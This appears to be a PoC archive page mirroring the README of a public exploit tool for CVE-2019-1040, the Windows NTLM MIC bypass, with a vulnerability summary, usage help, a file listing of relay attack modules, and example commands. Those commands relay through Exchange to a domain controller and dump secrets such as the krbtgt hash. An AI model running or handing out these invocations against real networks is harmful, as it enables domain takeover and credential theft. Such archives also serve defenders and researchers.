Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-1040 PoC — Windows NTLM Tampering Vulnerability

Source
https://github.com/Ridter/CVE-2019-1040
Associated Vulnerability
Title:Windows NTLM Tampering Vulnerability (CVE-2019-1040)
Description:A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection. An attacker who successfully exploited this vulnerability could gain the ability to downgrade NTLM security features. To exploit this vulnerability, the attacker would need to tamper with the NTLM exchange. The attacker could then modify flags of the NTLM packet without invalidating the signature. The update addresses the vulnerability by hardening NTLM MIC protection on the server-side.
Description
CVE-2019-1040 with Exchange
Readme
# CVE-2019-1040

Great writeup! [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) .

So, I wrote CVE-2019-1040.py for easy to use.

You can also check out my exchange2domain repo: https://github.com/ridter/exchange2domain, another way to use exchange to get DC.

## Requirements
These tools require [impacket](https://github.com/SecureAuthCorp/impacket). You can install it from pip with `pip install impacket`.

## Usage
```
usage: CVE-2019-1040.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
                        [--hashes HASHES] [--smb-port [destination port]] -ah
                        ATTACKER_HOST [-ap ATTACKER_PORT] -th TARGET_HOST
                        [-t TIMEOUT]
                        [--exec-method [{smbexec,wmiexec,mmcexec}]]
                        [--just-dc-user USERNAME] [--debug]
                        EX_HOSTNAME

CVE-2019-1040 with Exchange

positional arguments:
  EX_HOSTNAME           Hostname/ip of the Exchange server

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        username for authentication
  -d DOMAIN, --domain DOMAIN
                        domain the user is in (FQDN or NETBIOS domain name)
  -p PASSWORD, --password PASSWORD
                        Password for authentication, will prompt if not
                        specified and no NT:NTLM hashes are supplied
  --hashes HASHES       LM:NLTM hashes
  --smb-port [destination port]
                        Destination port to connect to SMB Server
  -ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
                        Attacker hostname or IP
  -th TARGET_HOST, --target-host TARGET_HOST
                        Hostname or IP of the DC
  -t TIMEOUT, --timeout TIMEOUT
                        timeout in seconds
  --exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
  --just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach.
  --debug               Enable debug output
```

example:
```
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip 
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip 
```


If you only want to dump `krbtgt`, use `--just-dc-user`.

example:
```
python CVE-2019-1040.py -ah attackterip -u user -p password -d domain.com -th DCip MailServerip  --just-dc-user krbtgt
python CVE-2019-1040.py -ah attackterip -u user --hashes userhash -d domain.com -th DCip MailServerip --just-dc-user krbtgt
```

![](pics/1560509768227.jpg)
File Snapshot

 [4.0K]  /data/pocs/1052350f3289f3dfbc4f45dcd1d9bb986b107c01
├── [4.0K]  comm
│   ├── [114K]  dump.py
│   ├── [   0]  __init__.py
│   ├── [ 997]  logger.py
│   ├── [4.0K]  ntlmrelayx
│   │   ├── [4.0K]  attacks
│   │   │   ├── [1.8K]  httpattack.py
│   │   │   ├── [3.7K]  imapattack.py
│   │   │   ├── [2.9K]  __init__.py
│   │   │   ├── [ 32K]  ldapattack.py
│   │   │   ├── [ 981]  mssqlattack.py
│   │   │   └── [5.7K]  smbattack.py
│   │   ├── [4.0K]  clients
│   │   │   ├── [4.8K]  httprelayclient.py
│   │   │   ├── [3.9K]  imaprelayclient.py
│   │   │   ├── [4.5K]  __init__.py
│   │   │   ├── [7.9K]  ldaprelayclient.py
│   │   │   ├── [5.6K]  mssqlrelayclient.py
│   │   │   ├── [ 22K]  smbrelayclient.py
│   │   │   └── [3.1K]  smtprelayclient.py
│   │   ├── [   5]  __init__.py
│   │   ├── [4.0K]  servers
│   │   │   ├── [ 16K]  httprelayserver.py
│   │   │   ├── [ 134]  __init__.py
│   │   │   ├── [ 32K]  smbrelayserver.py
│   │   │   ├── [4.0K]  socksplugins
│   │   │   │   ├── [8.1K]  http.py
│   │   │   │   ├── [1.9K]  https.py
│   │   │   │   ├── [9.4K]  imap.py
│   │   │   │   ├── [2.7K]  imaps.py
│   │   │   │   ├── [ 755]  __init__.py
│   │   │   │   ├── [9.1K]  mssql.py
│   │   │   │   ├── [ 26K]  smb.py
│   │   │   │   └── [6.8K]  smtp.py
│   │   │   └── [ 20K]  socksserver.py
│   │   └── [4.0K]  utils
│   │       ├── [4.3K]  config.py
│   │       ├── [2.5K]  enum.py
│   │       ├── [   5]  __init__.py
│   │       ├── [2.7K]  ssl.py
│   │       ├── [5.1K]  targetsutils.py
│   │       └── [1.0K]  tcpshell.py
│   ├── [ 13K]  restore.py
│   └── [7.2K]  secretsdump.py
├── [ 516]  config.py
├── [ 11K]  CVE-2019-1040.py
├── [1.2M]  impacket-0.9.19.tar.gz
├── [1.0K]  LICENSE
├── [4.0K]  pics
│   └── [469K]  1560509768227.jpg
├── [2.8K]  README.md
└── [  32]  requirements.txt

8 directories, 44 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →